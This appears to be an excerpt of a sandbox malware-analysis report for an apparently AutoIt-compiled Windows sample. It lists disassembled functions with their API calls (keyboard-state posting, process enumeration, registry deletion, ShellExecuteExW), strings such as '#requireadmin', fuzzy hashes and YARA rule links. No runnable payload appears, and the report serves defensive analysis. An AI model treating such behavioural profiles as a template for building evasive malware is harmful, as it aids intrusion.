Instruction Fuzzy Hash: EA3171B2200214BFEB218F94CC89FEA3FADEF49755F044065FF899A195C67A9841CB70

Function 010316DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

Part of subcall function 00FFC6F4: _wcscpy.LIBCMT ref: 00FFC717

_wcstok.LIBCMT ref: 0103184E
_wcscpy.LIBCMT ref: 010318DD
_memset.LIBCMT ref: 01031910

Strings

X, xrefs: 01031948

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: b7c0102dda04dead9d0a56e9947c39e5abc53ee29f3292815c84be9f7edcd213
Instruction ID: a7f872a9d3898a9977717c2475ad69909bdf6a32f09938437382654d3840ac38
Opcode Fuzzy Hash: b7c0102dda04dead9d0a56e9947c39e5abc53ee29f3292815c84be9f7edcd213
Instruction Fuzzy Hash: 5BC19E356043819FD764EF29CC81A9EB7E4BF89350F00496DF9D99B2A1DB34E805DB82

Function 01050133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

GetSystemMetrics.USER32(0000000F), ref: 0105016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0105038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 010503AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 010503D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 010503FF
ShowWindow.USER32(00000003,00000000), ref: 01050421
DefDlgProcW.USER32(?,00000005,?,?), ref: 01050440

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 6f274db99d13daa1152b1a42dc520eb94a8b902b8694c41f407030c494f51357
Instruction ID: f02186e3f7b41743f2a438d2e326a151281b008a2b666ce93e275e82602975a4
Opcode Fuzzy Hash: 6f274db99d13daa1152b1a42dc520eb94a8b902b8694c41f407030c494f51357
Instruction Fuzzy Hash: 22A1DC34600616EBDB98CF68C9857BFBBF5BF08740F088155FD94AB299DB34A950CB90

Function 00FFAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075cac9034390a324891d6d471ded0e85159888966be8ff8bd3d7cb079f575a0
Instruction ID: 358bf878ab40b5b4f7730d97bd33e1f1f4bfbb839d683f5694e3fc5352b8b288
Opcode Fuzzy Hash: 075cac9034390a324891d6d471ded0e85159888966be8ff8bd3d7cb079f575a0
Instruction Fuzzy Hash: 95719FB1900109EFDB14CF98CC88ABFBB74FF85310F148149FA59AA2A5C7349A11DF65

Function 01042230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104225A
_memset.LIBCMT ref: 01042323
ShellExecuteExW.SHELL32(?), ref: 01042368

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

Part of subcall function 00FFC6F4: _wcscpy.LIBCMT ref: 00FFC717

CloseHandle.KERNEL32(00000000), ref: 0104242F
FreeLibrary.KERNEL32(00000000), ref: 0104243E

Strings

@, xrefs: 01042334

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: ea93db664396172f9d7a7a9ddd07812c5b4d762e52491cde402157791b71a38e
Instruction ID: ffdd306bc59f5ab4a43940cfc8204ceb0919b5f4ca93fb53b6a5f80f6f7afcd3
Opcode Fuzzy Hash: ea93db664396172f9d7a7a9ddd07812c5b4d762e52491cde402157791b71a38e
Instruction Fuzzy Hash: 34718FB4A006199FDF05EF99D9809AEBBF5FF48310F048469F995AB391CB34AD40CB90

Function 01023DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 01023DE7
GetKeyboardState.USER32(?), ref: 01023DFC
SetKeyboardState.USER32(?), ref: 01023E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 01023E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 01023EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 01023EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 01023F13

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cf72001cd19b7569bdada527483f80709865f610eeb28ecad6ea7662e90f012e
Instruction ID: 11bb7084879b5de8632c874426c2589bc902149570f40cb478a0308ce298d076
Opcode Fuzzy Hash: cf72001cd19b7569bdada527483f80709865f610eeb28ecad6ea7662e90f012e
Instruction Fuzzy Hash: B851D5A06047E53DFF7642388845BBA7EE96F0A304F0845C9E2D98A8D3D39DE888D750

Function 01023BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 01023C02
GetKeyboardState.USER32(?), ref: 01023C17
SetKeyboardState.USER32(?), ref: 01023C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01023CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01023CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01023D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01023D26

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 52a03dc984175146f62edacc496d0ebe9ad1c1c96999edf1fea4e1e9a9ae6485
Instruction ID: f9dccf3f9b55a9b4d0470990a72aa5a43f3b13a1fd7195d35c142e60b67fc33d
Opcode Fuzzy Hash: 52a03dc984175146f62edacc496d0ebe9ad1c1c96999edf1fea4e1e9a9ae6485
Instruction Fuzzy Hash: C151E6A06047E53DFB3797688C55BB6BFD97B0A300F1884C9E2D94E8C2D699E884E750

Function 01027DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 01027DBE
_wcsncpy.LIBCMT ref: 01027DF3
_wcsncpy.LIBCMT ref: 01027E25
_wcsncpy.LIBCMT ref: 01027E58
_wcsncpy.LIBCMT ref: 01027E9A
_wcsncpy.LIBCMT ref: 01027ED4
_wcsncpy.LIBCMT ref: 01027F03

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 53350619692b64d62adf4a27a7405e7dcfc151d1677f482b290831af23fef001
Instruction ID: 9bb0b681420c400e7fb9b067d91a540d1b9b24dcc5368bcb79a7aebf0751b617
Opcode Fuzzy Hash: 53350619692b64d62adf4a27a7405e7dcfc151d1677f482b290831af23fef001
Instruction Fuzzy Hash: 45416266D1021976EB11EBF4CC49ECFB7AC9F25310F548867E984F3160F634E61483A6

Function 01043D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 01043DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01043DCB
FreeLibrary.KERNEL32(00000000), ref: 01043E80

Part of subcall function 01043D72: RegCloseKey.ADVAPI32(?), ref: 01043DE8
Part of subcall function 01043D72: FreeLibrary.KERNEL32(?), ref: 01043E3A
Part of subcall function 01043D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01043E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 01043E25

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 4c68b5542c01fa09486afb33e422a26d63d95cc09eddafa41dbccb3c476093d7
Instruction ID: fa46bf6837b7c6c009d8ad285e4f33bc99188e6e082c282ca20378cfd09c6fd8
Opcode Fuzzy Hash: 4c68b5542c01fa09486afb33e422a26d63d95cc09eddafa41dbccb3c476093d7
Instruction Fuzzy Hash: DE312FB1901119BFEB259FD5DC85AFFB7BCFF08340F0001B9E592A6190D7749A449B60

Function 01048FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01048FE7
GetWindowLongW.USER32(00A5DEC8,000000F0), ref: 0104901A
GetWindowLongW.USER32(00A5DEC8,000000F0), ref: 0104904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01049081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010490AB
GetWindowLongW.USER32(00000000,000000F0), ref: 010490BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010490D6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ebe6bbe6d0b1135b9d5abd2239a0c6eab1e2de5ff9620cd41d714026b494aff5
Instruction ID: 212890ec6fbbb2fa6e94efc3850c440eb1304e1afaa2c8a291d7f14bb9e8f41c
Opcode Fuzzy Hash: ebe6bbe6d0b1135b9d5abd2239a0c6eab1e2de5ff9620cd41d714026b494aff5
Instruction Fuzzy Hash: 223134B4600215AFDB218F98D8C8F6637E5FB4E358F1441B4F6998B2A6CB76A840CB40

Function 010208AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010208F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01020918
SysAllocString.OLEAUT32(00000000), ref: 0102091B
SysAllocString.OLEAUT32(?), ref: 01020939
SysFreeString.OLEAUT32(?), ref: 01020942
StringFromGUID2.OLE32(?,?,00000028), ref: 01020967
SysAllocString.OLEAUT32(?), ref: 01020975

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 09e668198d754eade3086487c55d003c688ccbf8b3f6aca155f730be895a653a
Instruction ID: 801fc9e4b9239e63d0b2d41ce953360e72e9d32a6b7252264cdbe5799f8d9787
Opcode Fuzzy Hash: 09e668198d754eade3086487c55d003c688ccbf8b3f6aca155f730be895a653a
Instruction Fuzzy Hash: FE219176700218AFAB109AACCC88DAB73ECEB08360B048125F985DB1A9D674ED458B60

Function 01022472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 01022485
__wcsnicmp.LIBCMT ref: 010224A6
__wcsnicmp.LIBCMT ref: 010224C0

Strings

#requireadmin, xrefs: 010224A0
#OnAutoItStartRegister, xrefs: 010224BA
#notrayicon, xrefs: 0102247D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 3d89da43bfaa9eccd4ad18c1eae43a877293257938e3f3ea0f33530854026925
Instruction ID: 47085f4465723e9a0ec11d7ca2d4c927f2308222b39cee9115e177117a99641c
Opcode Fuzzy Hash: 3d89da43bfaa9eccd4ad18c1eae43a877293257938e3f3ea0f33530854026925
Instruction Fuzzy Hash: 84214C3110463567E321BAB89D11FBB73E9EF65300F54842AF5CA97081EB759A82C3A5

Function 01020986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010209CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010209F1
SysAllocString.OLEAUT32(00000000), ref: 010209F4
SysAllocString.OLEAUT32 ref: 01020A15
SysFreeString.OLEAUT32 ref: 01020A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 01020A38
SysAllocString.OLEAUT32(?), ref: 01020A46

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ed80a629e64cc15a285a887a03322d763dc46e0570136674599dc63c82c3522a
Instruction ID: 04eb649efeb5b14adeb6c6148d94795da842c41272d2fa83f11c953cad67cbfc
Opcode Fuzzy Hash: ed80a629e64cc15a285a887a03322d763dc46e0570136674599dc63c82c3522a
Instruction Fuzzy Hash: 53216275300214AF9B109BECDC88DAB77ECEF083607448165F989CB269DA74EC458764

Function 0104A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FFD1BA
Part of subcall function 00FFD17C: GetStockObject.GDI32(00000011), ref: 00FFD1CE
Part of subcall function 00FFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FFD1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0104A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0104A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0104A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0104A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0104A360

Strings

Msctls_Progress32, xrefs: 0104A2FE

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 730ce17df5c317ad3798f73f7e5ce403ec8a07352b4706de60f81e384a178712
Instruction ID: de17dfdab67025bb075f892af7fa4be6cd9d14b6e2df9fd067d78956ad933016
Opcode Fuzzy Hash: 730ce17df5c317ad3798f73f7e5ce403ec8a07352b4706de60f81e384a178712
Instruction Fuzzy Hash: D61193B1250119BFEF115E65CC85EEB7F6DFF08798F018114FA45A6060C6769C21DBA4

Function 00FFCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00FFCCF6
GetWindowRect.USER32(?,?), ref: 00FFCD37
ScreenToClient.USER32(?,?), ref: 00FFCD5F
GetClientRect.USER32(?,?), ref: 00FFCE8C
GetWindowRect.USER32(?,?), ref: 00FFCEA5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 80ca91a9f10774b0c28890d921ac35534b70cbca69110369f8aaa11014597547
Instruction ID: 2de94280c9f19bdb6fac2d46feb2ca4528aa3f4648e001cada949491fd70d7b4
Opcode Fuzzy Hash: 80ca91a9f10774b0c28890d921ac35534b70cbca69110369f8aaa11014597547
Instruction Fuzzy Hash: 13B15C7990024DDBDF50CFA8C5807EEBBB1FF08310F149569ED99AB264DB30AA50DB94

Function 01041BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 01041C18
Process32FirstW.KERNEL32(00000000,?), ref: 01041C26
__wsplitpath.LIBCMT ref: 01041C54

Part of subcall function 01001DFC: __wsplitpath_helper.LIBCMT ref: 01001E3C

_wcscat.LIBCMT ref: 01041C69
Process32NextW.KERNEL32(00000000,?), ref: 01041CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 01041CF1

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 79ff8bfdde3b07d29f09e05cc6168fd974ddbf6d24322ad83e149b6e70ca7043
Instruction ID: 628b1513bbd968e37c9892e34f5ea4dcfe445d5895fc7b13a907ad2d5e0c68b3
Opcode Fuzzy Hash: 79ff8bfdde3b07d29f09e05cc6168fd974ddbf6d24322ad83e149b6e70ca7043
Instruction Fuzzy Hash: 25517CB11083459FD720EF64CC85EABB7E8AF88754F00492EF58597291DB74E905CB92

Function 01042FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01043C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01042BB5,?,?), ref: 01043C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010430AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010430EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01043112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0104313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0104317E
RegCloseKey.ADVAPI32(00000000), ref: 0104318B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: c174ed81c01296daa842e88573f26178854d3ed06e323d4cee380b06c192739b
Instruction ID: 2f3c288a476d46feba353877dc61e39c10fa4d444030a6133f81e6fc06370f4b
Opcode Fuzzy Hash: c174ed81c01296daa842e88573f26178854d3ed06e323d4cee380b06c192739b
Instruction Fuzzy Hash: 8C516771208250AFD714EF68CC95E6EBBF8BF88300F04492DF6958B2A1DB75E905DB52

Function 010484DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 01048540
GetMenuItemCount.USER32(00000000), ref: 01048577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0104859F
GetMenuItemID.USER32(?,?), ref: 0104860E
GetSubMenu.USER32(?,?), ref: 0104861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0104866D

Memory Dump Source

